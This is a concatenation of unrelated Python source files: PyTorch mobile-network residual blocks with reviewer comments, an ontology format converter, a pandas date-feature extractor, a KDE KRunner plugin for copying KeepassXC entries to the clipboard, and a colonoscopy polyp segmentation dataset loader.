        x = self.bn1(x)
        x = self.act1(x)
        # Depth-wise convolution
        x = self.conv_dw(x)
        x = self.bn2(x)
        x = self.act2(x)
        # Squeeze-and-excitation
        if self.se is not None:
            x = self.se(x)
        # Point-wise linear projection
        x = self.conv_pwl(x)
        x = self.bn3(x)
        if self.has_residual:
            # stochastic depth, applied on the residual branch only
            if self.drop_path_rate > 0.:
                x = drop_path(x, self.drop_path_rate, self.training)
            x += residual
        return x
class I2RGhostBlock(nn.Module):
    """
    Mobile Inverted Residual Bottleneck Block (i2r "ghost" variant).

    Unlike the classic inverted residual, this block *reduces* channels first
    (project) and expands afterwards; half of the input channels ("ghost"
    features) bypass the two 1x1 convolutions and are concatenated back.

    Args:
        block_args (namedtuple): BlockArgs, see above
        global_params (namedtuple): GlobalParam, see above
    Attributes:
        has_se (bool): Whether the block contains a Squeeze and Excitation layer.
    """
    def __init__(self, in_chs, out_chs, dw_kernel_size=3,
                 stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False,
                 exp_ratio=1.0, exp_kernel_size=1, pw_kernel_size=1,
                 se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None,
                 conv_kwargs=None, drop_path_rate=0., keep_3x3=False, group_1x1=1):
        super().__init__()
        norm_kwargs = norm_kwargs or {}
        conv_kwargs = conv_kwargs or {}
        mid_chs = make_divisible(in_chs * exp_ratio)  # NOTE(review): computed but never used
        self.has_se = se_ratio is not None and se_ratio > 0.
        self.has_residual = (in_chs == out_chs and stride == 1) and not noskip  # NOTE(review): unused; `identity` gates the skip
        self.drop_path_rate = drop_path_rate
        self.expand_ratio = exp_ratio
        # Get static or dynamic convolution depending on image size
        # Conv2d = get_same_padding_conv2d(image_size=global_params.image_size)
        Conv2d = nn.Conv2d
        # Expansion phase
        inp = in_chs
        oup = in_chs // self.expand_ratio  # bottleneck width between the two 1x1 convs
        final_oup = out_chs
        self.inp, self.final_oup = inp, final_oup
        self.identity = False
        # NOTE(review): `oup < oup / 6.` can never be True for positive `oup`;
        # the reference implementation compares against a different width —
        # confirm the intended condition.
        if oup < oup / 6.:
            oup = math.ceil(oup / 6.)
            oup = make_divisible(oup, 16)
        oup = make_divisible(oup, 2)
        k = dw_kernel_size
        s = stride
        # apply repeat scheme: half of the input channels become "ghost" features
        self.split_ratio = 2
        self.ghost_idx_inp = inp // self.split_ratio
        self.ghost_idx_oup = int(final_oup - self.ghost_idx_inp)
        self.inp, self.final_oup, self.s = inp, final_oup, s
        if self.expand_ratio == 2:
            # dw conv -> project 1x1 -> expand 1x1 -> concat ghost -> dw conv (strided)
            self.dwise_conv1 = Conv2d(in_channels=in_chs, out_channels=in_chs, kernel_size=k, padding=k // 2,
                                      bias=False, groups=in_chs)
            self.bn1 = norm_layer(in_chs, **norm_kwargs)
            self.act = act_layer(inplace=True)
            # first linear layer
            self.project_layer = Conv2d(in_channels=self.ghost_idx_inp, out_channels=oup, kernel_size=1, bias=False)
            self.bn2 = norm_layer(oup, **norm_kwargs)
            # second linear layer
            self.expand_layer = Conv2d(in_channels=oup, out_channels=self.ghost_idx_oup, kernel_size=1, bias=False)
            self.bn3 = norm_layer(self.ghost_idx_oup, **norm_kwargs)
            # expand layer
            self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2,
                                      bias=False, groups=final_oup, stride=s)
            self.bn4 = norm_layer(final_oup, **norm_kwargs)
        elif inp != final_oup and s == 1:
            # channel change without stride: only the two 1x1 layers are needed
            self.project_layer = Conv2d(in_channels=in_chs, out_channels=oup, kernel_size=1, bias=False)
            self.bn2 = norm_layer(oup, **norm_kwargs)
            # only two linear layers are needed
            self.expand_layer = Conv2d(in_channels=oup, out_channels=final_oup, kernel_size=1, bias=False,
                                       groups=group_1x1)
            self.bn3 = norm_layer(final_oup, **norm_kwargs)
            self.act = act_layer(inplace=True)
        elif in_chs != final_oup and s == 2:
            # channel change with downsampling: add a trailing strided depthwise conv
            self.project_layer = Conv2d(in_channels=in_chs, out_channels=oup, kernel_size=1, bias=False)
            self.bn2 = norm_layer(oup, **norm_kwargs)
            self.expand_layer = Conv2d(in_channels=oup, out_channels=final_oup, kernel_size=1, bias=False)
            self.bn3 = norm_layer(final_oup, **norm_kwargs)
            self.act = act_layer(inplace=True)
            self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2,
                                      bias=False, groups=final_oup, stride=s)
            self.bn4 = norm_layer(final_oup, **norm_kwargs)
        else:
            # same in/out shape: identity (residual) variant with ghost features
            self.identity = True
            self.dwise_conv1 = Conv2d(in_channels=in_chs, out_channels=in_chs, kernel_size=k, padding=k // 2,
                                      bias=False, groups=in_chs)
            self.bn1 = norm_layer(in_chs, **norm_kwargs)
            self.act = act_layer(inplace=True)
            self.project_layer = Conv2d(in_channels=self.ghost_idx_inp, out_channels=oup, kernel_size=1, bias=False,
                                        groups=group_1x1)
            self.bn2 = norm_layer(oup, **norm_kwargs)
            self.expand_layer = Conv2d(in_channels=oup, out_channels=self.ghost_idx_oup, kernel_size=1, bias=False,
                                       groups=group_1x1)
            self.bn3 = norm_layer(self.ghost_idx_oup, **norm_kwargs)
            self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2,
                                      bias=False, groups=final_oup)
            self.bn4 = norm_layer(final_oup, **norm_kwargs)
        if self.has_se:
            se_mode = 'large'
            if se_mode == 'large':
                se_frac = 0.5
                se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer)
                self.se = SqueezeExcite(out_chs, se_ratio=se_ratio * se_frac, **se_kwargs)
            else:
                se_frac = 1
                se_kwargs = resolve_se_args(se_kwargs, out_chs, act_layer)
                self.se = SqueezeExcite(out_chs, se_ratio=se_ratio * se_frac / exp_ratio, **se_kwargs)

    def forward(self, inputs, drop_path_rate=None):
        """
        :param inputs: input tensor
        :param drop_path_rate: drop path rate (float, between 0 and 1)
            NOTE(review): this argument is unused; ``self.drop_path_rate`` is
            applied instead — confirm whether the override was intended.
        :return: output of block
        """
        if self.expand_ratio == 2:
            # first dwise conv
            x = self.act(self.bn1(self.dwise_conv1(inputs)))
            # the ghost half bypasses the two 1x1 convs entirely
            ghost_id = x[:, self.ghost_idx_inp:, :, :]
            # first 1x1 conv
            x = self.bn2(self.project_layer(x[:, :self.ghost_idx_inp, :, :]))
            # second 1x1 conv
            x = self.act(self.bn3(self.expand_layer(x)))
            # generate more features
            x = torch.cat([x, ghost_id], dim=1)
            # second dwise conv
            x = self.bn4(self.dwise_conv2(x))
        elif self.inp != self.final_oup and self.s == 1:
            # first 1x1 conv
            x = self.bn2(self.project_layer(inputs))
            # second 1x1 conv
            x = self.act(self.bn3(self.expand_layer(x)))
        elif self.inp != self.final_oup and self.s == 2:
            # first 1x1 conv
            x = self.bn2(self.project_layer(inputs))
            # second 1x1 conv
            x = self.act(self.bn3(self.expand_layer(x)))
            # second dwise conv
            x = self.bn4(self.dwise_conv2(x))
        else:
            # first dwise conv
            x = self.act(self.bn1(self.dwise_conv1(inputs)))
            # first 1x1 conv
            ghost_id = x[:, self.ghost_idx_inp:, :, :]
            x = self.bn2(self.project_layer(x[:, :self.ghost_idx_inp, :, :]))
            # second 1x1 conv
            x = self.act(self.bn3(self.expand_layer(x)))
            # second dwise conv
            x = torch.cat([x, ghost_id], dim=1)
            x = self.bn4(self.dwise_conv2(x))
        # Squeeze-and-excitation
        if self.has_se:
            x = self.se(x)
        # Skip connection and drop connect (only in the identity configuration)
        if self.identity:
            if self.drop_path_rate > 0.:
                x = drop_path(x, self.drop_path_rate, self.training)
            x = x + inputs
            return x
        else:
            return x
class I2RBlock(nn.Module):
    """
    Mobile Inverted Residual Bottleneck Block (i2r variant, no ghost split).

    Channels are first *reduced* by a 1x1 projection and then expanded back,
    the inverse of the classic inverted residual ordering.

    Args:
        block_args (namedtuple): BlockArgs, see above
        global_params (namedtuple): GlobalParam, see above
    Attributes:
        has_se (bool): Whether the block contains a Squeeze and Excitation layer.
    """
    def __init__(self, in_chs, out_chs, dw_kernel_size=3,
                 stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False,
                 exp_ratio=1.0, exp_kernel_size=1, pw_kernel_size=1,
                 se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None,
                 conv_kwargs=None, drop_path_rate=0., keep_3x3=False, group_1x1=2):
        super().__init__()
        norm_kwargs = norm_kwargs or {}
        conv_kwargs = conv_kwargs or {}
        mid_chs = make_divisible(in_chs * exp_ratio)  # NOTE(review): computed but never used
        self.has_se = se_ratio is not None and se_ratio > 0.
        self.has_residual = (in_chs == out_chs and stride == 1) and not noskip  # NOTE(review): unused; `identity` gates the skip
        self.drop_path_rate = drop_path_rate
        self.expand_ratio = exp_ratio
        # Get static or dynamic convolution depending on image size
        # Conv2d = get_same_padding_conv2d(image_size=global_params.image_size)
        Conv2d = nn.Conv2d
        # Expansion phase
        inp = in_chs
        oup = in_chs // self.expand_ratio  # bottleneck width between the two 1x1 convs
        final_oup = out_chs
        self.inp, self.final_oup = inp, final_oup
        self.identity = False
        # NOTE(review): `oup < oup / 6.` can never be True for positive `oup`;
        # the reference implementation compares against a different width —
        # confirm the intended condition.
        if oup < oup / 6.:
            oup = math.ceil(oup / 6.)
            oup = make_divisible(oup, 16)
        oup = make_divisible(oup, 2)
        k = dw_kernel_size
        s = stride
        # apply repeat scheme
        # NOTE(review): ghost_idx_inp == inp, so the "ghost" slice taken in
        # forward() is empty — unlike I2RGhostBlock, no channels bypass the 1x1s.
        self.ghost_idx_inp = inp
        self.ghost_idx_oup = final_oup
        self.inp, self.final_oup, self.s = inp, final_oup, s
        if self.expand_ratio == 2:
            # dw conv -> project 1x1 (grouped) -> expand 1x1 (grouped) -> dw conv (strided)
            self.dwise_conv1 = Conv2d(in_channels=in_chs, out_channels=in_chs, kernel_size=k, padding=k // 2,
                                      bias=False, groups=in_chs)
            self.bn1 = norm_layer(in_chs, **norm_kwargs)
            self.act = act_layer(inplace=True)
            # first linear layer
            self.project_layer = Conv2d(in_channels=self.ghost_idx_inp, out_channels=oup, kernel_size=1, bias=False,
                                        groups=group_1x1)
            self.bn2 = norm_layer(oup, **norm_kwargs)
            # second linear layer
            self.expand_layer = Conv2d(in_channels=oup, out_channels=self.ghost_idx_oup, kernel_size=1, bias=False,
                                       groups=group_1x1)
            self.bn3 = norm_layer(self.ghost_idx_oup, **norm_kwargs)
            # expand layer
            self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2,
                                      bias=False, groups=final_oup, stride=s)
            self.bn4 = norm_layer(final_oup, **norm_kwargs)
        elif inp != final_oup and s == 1:
            # channel change without stride: only the two 1x1 layers are needed
            self.project_layer = Conv2d(in_channels=in_chs, out_channels=oup, kernel_size=1, bias=False)
            self.bn2 = norm_layer(oup, **norm_kwargs)
            # only two linear layers are needed
            self.expand_layer = Conv2d(in_channels=oup, out_channels=final_oup, kernel_size=1, bias=False)
            self.bn3 = norm_layer(final_oup, **norm_kwargs)
            self.act = act_layer(inplace=True)
        elif in_chs != final_oup and s == 2:
            # channel change with downsampling: add a trailing strided depthwise conv
            self.project_layer = Conv2d(in_channels=in_chs, out_channels=oup, kernel_size=1, bias=False)
            self.bn2 = norm_layer(oup, **norm_kwargs)
            self.expand_layer = Conv2d(in_channels=oup, out_channels=final_oup, kernel_size=1, bias=False)
            self.bn3 = norm_layer(final_oup, **norm_kwargs)
            self.act = act_layer(inplace=True)
            self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2,
                                      bias=False, groups=final_oup, stride=s)
            self.bn4 = norm_layer(final_oup, **norm_kwargs)
        else:
            # same in/out shape: identity (residual) variant
            self.identity = True
            self.dwise_conv1 = Conv2d(in_channels=in_chs, out_channels=in_chs, kernel_size=k, padding=k // 2,
                                      bias=False, groups=in_chs)
            self.bn1 = norm_layer(in_chs, **norm_kwargs)
            self.act = act_layer(inplace=True)
            self.project_layer = Conv2d(in_channels=self.ghost_idx_inp, out_channels=oup, kernel_size=1, bias=False,
                                        groups=group_1x1)
            self.bn2 = norm_layer(oup, **norm_kwargs)
            self.expand_layer = Conv2d(in_channels=oup, out_channels=self.ghost_idx_oup, kernel_size=1, bias=False,
                                       groups=group_1x1)
            self.bn3 = norm_layer(self.ghost_idx_oup, **norm_kwargs)
            self.dwise_conv2 = Conv2d(in_channels=final_oup, out_channels=final_oup, kernel_size=k, padding=k // 2,
                                      bias=False, groups=final_oup)
            self.bn4 = norm_layer(final_oup, **norm_kwargs)
        if self.has_se:
            se_mode = 'small'
            if se_mode == 'large':
                se_frac = 0.5
                se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer)
                self.se = SqueezeExcite(out_chs, se_ratio=se_ratio * se_frac, **se_kwargs)
            else:
                se_frac = 1
                se_kwargs = resolve_se_args(se_kwargs, out_chs, act_layer)
                self.se = SqueezeExcite(out_chs, se_ratio=se_ratio * se_frac / exp_ratio, **se_kwargs)

    def forward(self, inputs, drop_path_rate=None):
        """
        :param inputs: input tensor
        :param drop_path_rate: drop path rate (float, between 0 and 1)
            NOTE(review): this argument is unused; ``self.drop_path_rate`` is
            applied instead — confirm whether the override was intended.
        :return: output of block
        """
        if self.expand_ratio == 2:
            # first dwise conv
            x = self.act(self.bn1(self.dwise_conv1(inputs)))
            # first 1x1 conv (ghost slice is empty here since ghost_idx_inp == inp)
            ghost_id = x[:, self.ghost_idx_inp:, :, :]
            x = self.bn2(self.project_layer(x[:, :self.ghost_idx_inp, :, :]))
            # second 1x1 conv
            x = self.act(self.bn3(self.expand_layer(x)))
            # generate more features
            x = torch.cat([x, ghost_id], dim=1)
            # second dwise conv
            x = self.bn4(self.dwise_conv2(x))
        elif self.inp != self.final_oup and self.s == 1:
            # first 1x1 conv
            x = self.bn2(self.project_layer(inputs))
            # second 1x1 conv
            x = self.act(self.bn3(self.expand_layer(x)))
        elif self.inp != self.final_oup and self.s == 2:
            # first 1x1 conv
            x = self.bn2(self.project_layer(inputs))
            # second 1x1 conv
            x = self.act(self.bn3(self.expand_layer(x)))
            # second dwise conv
            x = self.bn4(self.dwise_conv2(x))
        else:
            # first dwise conv
            x = self.act(self.bn1(self.dwise_conv1(inputs)))
            # first 1x1 conv
            ghost_id = x[:, self.ghost_idx_inp:, :, :]
            x = self.bn2(self.project_layer(x[:, :self.ghost_idx_inp, :, :]))
            # second 1x1 conv
            x = self.act(self.bn3(self.expand_layer(x)))
            # second dwise conv
            x = torch.cat([x, ghost_id], dim=1)
            x = self.bn4(self.dwise_conv2(x))
        # Squeeze-and-excitation
        if self.has_se:
            x = self.se(x)
        # Skip connection and drop connect (only in the identity configuration)
        if self.identity:
            if self.drop_path_rate > 0.:
                x = drop_path(x, self.drop_path_rate, self.training)
            x = x + inputs
            return x
        else:
            return x
class CondConvResidual(InvertedResidual):
    """ Inverted residual block w/ CondConv routing"""
    def __init__(self, in_chs, out_chs, dw_kernel_size=3,
                 stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False,
                 exp_ratio=1.0, exp_kernel_size=1, pw_kernel_size=1,
                 se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None,
                 num_experts=0, drop_path_rate=0.):
        self.num_experts = num_experts
        # conv_kwargs carry num_experts into create_conv2d
        # (presumably selecting the CondConv variants — confirm in .layers)
        conv_kwargs = dict(num_experts=self.num_experts)
        super(CondConvResidual, self).__init__(
            in_chs, out_chs, dw_kernel_size=dw_kernel_size, stride=stride, dilation=dilation, pad_type=pad_type,
            act_layer=act_layer, noskip=noskip, exp_ratio=exp_ratio, exp_kernel_size=exp_kernel_size,
            pw_kernel_size=pw_kernel_size, se_ratio=se_ratio, se_kwargs=se_kwargs,
            norm_layer=norm_layer, norm_kwargs=norm_kwargs, conv_kwargs=conv_kwargs,
            drop_path_rate=drop_path_rate)
        # maps globally pooled input features to per-expert mixing weights
        self.routing_fn = nn.Linear(in_chs, self.num_experts)

    def forward(self, x):
        residual = x
        # CondConv routing: expert weights conditioned on the pooled input
        pooled_inputs = F.adaptive_avg_pool2d(x, 1).flatten(1)
        routing_weights = torch.sigmoid(self.routing_fn(pooled_inputs))
        # Point-wise expansion
        x = self.conv_pw(x, routing_weights)
        x = self.bn1(x)
        x = self.act1(x)
        # Depth-wise convolution
        x = self.conv_dw(x, routing_weights)
        x = self.bn2(x)
        x = self.act2(x)
        # Squeeze-and-excitation
        if self.se is not None:
            x = self.se(x)
        # Point-wise linear projection
        x = self.conv_pwl(x, routing_weights)
        x = self.bn3(x)
        if self.has_residual:
            # stochastic depth, applied on the residual branch only
            if self.drop_path_rate > 0.:
                x = drop_path(x, self.drop_path_rate, self.training)
            x += residual
        return x
class EdgeResidual(nn.Module):
    """ Residual block with expansion convolution followed by pointwise-linear w/ stride"""
    def __init__(self, in_chs, out_chs, exp_kernel_size=3, exp_ratio=1.0, fake_in_chs=0,
                 stride=1, dilation=1, pad_type='', act_layer=nn.ReLU, noskip=False, pw_kernel_size=1,
                 se_ratio=0., se_kwargs=None, norm_layer=nn.BatchNorm2d, norm_kwargs=None,
                 drop_path_rate=0.):
        super(EdgeResidual, self).__init__()
        norm_kwargs = norm_kwargs or {}
        # `fake_in_chs` lets the expansion width be computed from a channel
        # count other than the real input — presumably for architecture-search
        # compatibility; confirm against callers.
        if fake_in_chs > 0:
            mid_chs = make_divisible(fake_in_chs * exp_ratio)
        else:
            mid_chs = make_divisible(in_chs * exp_ratio)
        has_se = se_ratio is not None and se_ratio > 0.
        # skip connection is only valid when the tensor shape is preserved
        self.has_residual = (in_chs == out_chs and stride == 1) and not noskip
        self.drop_path_rate = drop_path_rate
        # Expansion convolution (a full conv, not depthwise, carrying the stride)
        self.conv_exp = create_conv2d(
            in_chs, mid_chs, exp_kernel_size, stride=stride, dilation=dilation, padding=pad_type)
        self.bn1 = norm_layer(mid_chs, **norm_kwargs)
        self.act1 = act_layer(inplace=True)
        # Squeeze-and-excitation
        if has_se:
            se_kwargs = resolve_se_args(se_kwargs, in_chs, act_layer)
            self.se = SqueezeExcite(mid_chs, se_ratio=se_ratio, **se_kwargs)
        else:
            self.se = None
        # Point-wise linear projection (no activation)
        self.conv_pwl = create_conv2d(mid_chs, out_chs, pw_kernel_size, padding=pad_type)
        self.bn2 = norm_layer(out_chs, **norm_kwargs)

    def feature_info(self, location):
        # feature tap: which module to hook and the channel count at that point
        if location == 'expansion':  # after SE, before PWL
            info = dict(module='conv_pwl', hook_type='forward_pre', num_chs=self.conv_pwl.in_channels)
        else:  # location == 'bottleneck', block output
            info = dict(module='', hook_type='', num_chs=self.conv_pwl.out_channels)
        return info

    def forward(self, x):
        residual = x
        # Expansion convolution
        x = self.conv_exp(x)
        x = self.bn1(x)
        x = self.act1(x)
        # Squeeze-and-excitation
        if self.se is not None:
            x = self.se(x)
        # Point-wise linear projection
        x = self.conv_pwl(x)
        x = self.bn2(x)
        if self.has_residual:
            # stochastic depth, applied on the residual branch only
            if self.drop_path_rate > 0.:
                x = drop_path(x, self.drop_path_rate, self.training)
            x += residual
        return x
|
StarcoderdataPython
|
319326
|
from indexor.indexor import Indexor
|
StarcoderdataPython
|
171076
|
# -*- coding: utf-8 -*-
"""Miscellaneous utilities."""
import gzip
import os
from subprocess import check_output # noqa:S404
# Public API of this module.
__all__ = [
    "obo_to_obograph",
    "obo_to_owl",
]
def obo_to_obograph(obo_path, obograph_path) -> None:
    """Convert an OBO file to a gzipped OBO Graph (JSON) file with pronto."""
    import pronto

    with gzip.open(obograph_path, "wb") as file:
        pronto.Ontology(obo_path).dump(file, format="json")
def obo_to_owl(obo_path, owl_path, owl_format: str = "ofn") -> str:
    """Convert an OBO file to an OWL file with ROBOT.

    Invokes the external ``robot convert`` command and returns its decoded
    standard output.
    """
    args = ["robot", "convert", "-i", obo_path, "-o", owl_path, "--format", owl_format]
    # NOTE(review): cwd is pinned to this module's directory — presumably so
    # `robot` resolves relative resources consistently; confirm.
    ret = check_output(  # noqa:S603
        args,
        cwd=os.path.dirname(__file__),
    )
    return ret.decode()
|
StarcoderdataPython
|
6706028
|
<reponame>Jie-Yuan/1_DataMining
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Project : iWork.
# @File : DateTimeFeat
# @Time : 2019-06-13 23:16
# @Author : yuanjie
# @Email : <EMAIL>
# @Software : PyCharm
# @Description :
import pandas as pd
from tqdm import tqdm
from datetime import timedelta
tqdm.pandas()
class DateTimeFeats(object):
    """Date/time feature engineering for pandas Series.

    Supported input formats:
      1. numeric epoch timestamps (seconds)
      2. date/time strings

    Unparseable values become NaT via ``pd.to_datetime(..., errors='coerce')``.
    """

    def __init__(self, include_feats=None):
        """
        :param include_feats: feature names to extract; defaults to
            ("year", "quarter", "month", "day", "hour", "minute",
             "week", "weekday", "weekofyear")
            (weekofyear == week)
        TODO: add "DayOfWeekInMonth" (week-of-month) to the defaults.
        """
        self.time_granularity = ("year", "quarter", "month",
                                 "day", "hour", "minute",
                                 "week", "weekday", "weekofyear")
        self.feats = include_feats if include_feats else self.time_granularity

    def transform(self, s: pd.Series, add_prefix=None):
        """Return a DataFrame with one column per requested feature.

        NOTE: uses ``Series.progress_map``, which requires ``tqdm.pandas()``
        to have been called (done at module import).
        """
        if s.name is None:
            s.name = 'time_str'
        if add_prefix is None:
            add_prefix = f"{s.name}_"
        feats = self.feats
        _dtype = s.dtypes.__str__()
        if 'int' in _dtype or 'float' in _dtype:
            # Numeric input is treated as an epoch timestamp in seconds.
            # NOTE(review): 13-digit millisecond stamps are not handled even
            # though upstream data may contain them — confirm with callers.
            print("infer_datetime_format: timestamp2date")
            ts = self.timestamp2date(s)
        else:
            print('infer_datetime_format: dateStr2date')
            ts = self.dateStr2date(s)
        _ = ts.progress_map(lambda t: list(self._func(t, feats)))
        df_ts = pd.DataFrame(_.tolist(), columns=feats).add_prefix(add_prefix)
        df_ts.insert(0, f'{s.name}2date', ts)
        return df_ts

    def _func(self, t, feats):
        # Yield each requested attribute of timestamp *t*; attributes that
        # are methods on some pandas versions (e.g. weekofyear) are called.
        for feat in feats:
            _ = t.__getattribute__(feat)
            if callable(_):
                yield _()
            else:
                yield _

    def timestamp2date(self, ts):
        """Convert an epoch-seconds Series to datetimes (NaT on failure)."""
        # 'coerce' is now passed by keyword instead of positionally, and the
        # deprecated infer_datetime_format flag (a no-op since pandas 2.0,
        # removed later) is dropped.
        return pd.to_datetime(ts, errors='coerce', unit='s')

    def dateStr2date(self, ts):
        """Convert a string Series to datetimes, falling back to coercion."""
        try:
            _ = ts.astype('datetime64[ns]')
        except Exception as e:
            print("astype('datetime64[ns]'): %s" % e)
            _ = pd.to_datetime(ts, errors='coerce')
        return _

    def DayOfWeekInMonth(self, t):
        """Return which week of its month *t* falls in (Monday-first).

        Computed as the %W week number of *t* minus that of the first day
        of its month, plus one.
        """
        b = int((t - timedelta(t.day - 1)).strftime("%W"))
        e = int(t.strftime("%W"))
        return e - b + 1
if __name__ == '__main__':
    # Bug fix: pd.datetime was deprecated and then removed from pandas;
    # pd.Timestamp.today() is the supported equivalent. The redundant
    # in-branch "import pandas as pd" is dropped (imported at module top).
    ts = pd.Series([pd.Timestamp.today()] * 10)
    print(DateTimeFeats().transform(ts))
|
StarcoderdataPython
|
1692247
|
#!/bin/env python3
import time
import signal
from gi.repository import GLib
import dbus.service
from dbus.mainloop.glib import DBusGMainLoop
from setproctitle import setproctitle, setthreadtitle
from typing import List
from .clipboard import Clipboard
from .keepass import KeepassPasswords
BUS_NAME = "de.naglfar.krunner-keepassxc"
OBJ_PATH="/krunner"
IFACE="org.kde.krunner1"
class Runner(dbus.service.Object):
    """DBus service implementing the org.kde.krunner1 interface for KeepassXC.

    Exposes Match/Actions/Run so KRunner can search KeepassXC entries and
    copy usernames or passwords to the clipboard.
    """
    kp: KeepassPasswords  # KeepassXC entry access (over DBus)
    cp: Clipboard  # xsel/xclip clipboard wrapper
    empty_action: str = ""  # follow-up action when Run() receives an empty matchId
    last_match: float  # unix time of the last Match() call; 0 when idle
    def __init__(self):
        # Register this object on the session bus under BUS_NAME/OBJ_PATH.
        DBusGMainLoop(set_as_default=True)
        sessionbus = dbus.SessionBus()
        sessionbus.request_name(BUS_NAME, dbus.bus.NAME_FLAG_REPLACE_EXISTING)
        bus_name = dbus.service.BusName(BUS_NAME, bus=sessionbus)
        dbus.service.Object.__init__(self, bus_name, OBJ_PATH)
        self.kp = KeepassPasswords()
        self.cp = Clipboard()
        self.last_match = 0
    def start(self):
        """Run the GLib main loop until SIGINT; periodically expires the cache."""
        setproctitle('krunner-keepassxc')
        setthreadtitle('krunner-keepassxc')
        loop = GLib.MainLoop()
        # clear saved data 15 seconds after last krunner match call
        def check_cache():
            if self.last_match:
                now = time.time()
                if now - 15 > self.last_match:
                    self.last_match = 0
                    self.kp.clear_cache()
            # return true to keep getting called, false to stop
            return True
        GLib.timeout_add(1000, check_cache)
        # handle sigint
        def sigint_handler(sig, frame):
            if sig == signal.SIGINT:
                print(' Quitting krunner-keepassxc')
                loop.quit()
            else:
                raise ValueError("Undefined handler for '{}'".format(sig))
        signal.signal(signal.SIGINT, sigint_handler)
        # start the main loop
        loop.run()
    def copy_to_clipboard(self, string: str):
        """Best-effort copy of *string* to the clipboard; errors are printed, not raised."""
        if string:
            try:
                self.cp.copy(string)
            except NotImplementedError as e:
                print('neither xsel nor xclip seem to be installed', flush=True)
            except Exception as e:
                print(str(e), flush=True)
    @dbus.service.method(IFACE, out_signature='a(sss)')
    def Actions(self):
        # define our secondary action(s)
        if len(self.kp.labels) == 0:
            return []
        else:
            return [
                # (action id, display text, icon name)
                ('user', 'copy username', 'username-copy'),
            ]
    @dbus.service.method(IFACE, in_signature='s', out_signature='a(sssida{sv})')
    def Match(self, query: str) -> List:
        """Return KRunner match tuples for *query* (min. 3 characters)."""
        matches:List = []
        if len(query) > 2:
            if not self.cp.can_clip:
                self.cp.check_executables()
            # Error states are reported to the user as pseudo-matches with an
            # empty data field (handled specially in Run()).
            if not self.cp.can_clip:
                matches = [
                    ('', "Neither xsel nor xclip installed", "object-unlocked", 100, 0.1, {})
                ]
            elif len(self.kp.labels) == 0:
                if not self.kp.is_keepass_installed():
                    matches = [
                        ('', "KeepassXC does not seem to be installed", "object-unlocked", 100, 0.1, {})
                    ]
                elif not self.kp.BUS_NAME:
                    matches = [
                        ('', "DBUS bus name not found", "object-unlocked", 100, 0.1, { })
                    ]
                else:
                    # no passwords found, show open keepass message
                    matches = [
                        ('', "No passwords or database locked", "object-unlocked", 100, 0.1, { 'subtext': 'Open KeepassXC' })
                    ]
                    self.empty_action = 'open-keepassxc'
            else:
                # find entries that contain the query
                items = [i for i in self.kp.labels if query.lower() in i.lower()]
                # sort entries starting with the query on top
                items.sort(key=lambda item: (not item.startswith(query), item))
                # max 5 entries
                items = items[:5]
                matches = [
                    # data, display text, icon, type (Plasma::QueryType), relevance (0-1), properties (subtext, category and urls)
                    (item, "Copy to clipboard: " + item, "object-unlocked", 100, (1 - (i * 0.1)), { 'subtext': self.kp.get_username(item) }) for i, item in enumerate(items)
                ]
            self.last_match = time.time()
        return matches
    @dbus.service.method(IFACE, in_signature='ss',)
    def Run(self, matchId: str, actionId: str):
        """Execute a match: copy password (default), username ('user'), or the empty-match action."""
        # matchId is data from Match, actionId is secondary action or empty for primary
        if len(matchId) == 0:
            # empty matchId means error of some kind
            if self.empty_action == 'open-keepassxc':
                self.kp.open_keepass()
        else:
            if actionId == 'user':
                user = self.kp.get_username(matchId)
                self.copy_to_clipboard(user)
            else:
                secret = self.kp.get_secret(matchId)
                self.copy_to_clipboard(secret)
            # clear all cached data on action
            self.kp.clear_cache()
            # clear last_match to skip needless check_cache
            self.last_match = 0
        self.empty_action = ""
|
StarcoderdataPython
|
1917257
|
<gh_stars>1-10
import os
import time
import numpy as np
from dataset_loaders.parallel_loader import ThreadedDataset
floatX = 'float32'
class Polyps912Dataset(ThreadedDataset):
    '''The Endoluminal Scene Segmentation (EndoScene) of Colonoscopy Images
    benchmark
    The EndoScene dataset [1]_ consists of 912 frames extracted from 44
    colonoscopy sequences of 36 patients. The dataset combines both CVC-ColonDB
    and CVC-ClinicDB datasets of [2]_ and extends the dataset annotations to
    account for 4 different semantic classes.
    This loader is intended for the EndoScene dataset version containing 2
    semantic classes, namely polyp and background, plus a void class annotating
    the border of the images. However, it could be easily adapted to account
    for 3 or 4 classes.
    The dataset should be downloaded from [1]_ into the `shared_path`
    (that should be specified in the config.ini according to the
    instructions in ../README.md).
    Parameters
    ----------
    which_set: string
        A string in ['train', 'val', 'valid', 'test'], corresponding to
        the set to be returned.
    References
    ----------
    .. [1] http://adas.cvc.uab.es/endoscene/
    .. [2] https://endovis.grand-challenge.org/
    '''
    name = 'polyps912'
    non_void_nclasses = 2
    _void_labels = [2]
    # optional arguments
    _cmap = {
        0: (0, 0, 0),           # Background
        1: (255, 255, 255),     # Polyp
        2: (128, 128, 128),     # Void
    }
    _mask_labels = {0: 'Background', 1: 'Polyp', 2: 'Void'}
    _filenames = None  # lazily-built cache for the `filenames` property
    @property
    def filenames(self):
        """Lazily list the extension-less basenames of all .bmp images in image_path."""
        import glob
        if self._filenames is None:
            # Load filenames
            filenames = []
            # Get file names from images folder
            file_pattern = os.path.join(self.image_path, "*.bmp")
            file_names = glob.glob(file_pattern)
            # print (str(file_names))
            # Get raw filenames from file names list
            for file_name in file_names:
                path, file_name = os.path.split(file_name)
                file_name, ext = os.path.splitext(file_name)
                filenames.append(file_name)
                # print (file_name)
            # Save the filenames list
            self._filenames = filenames
        return self._filenames
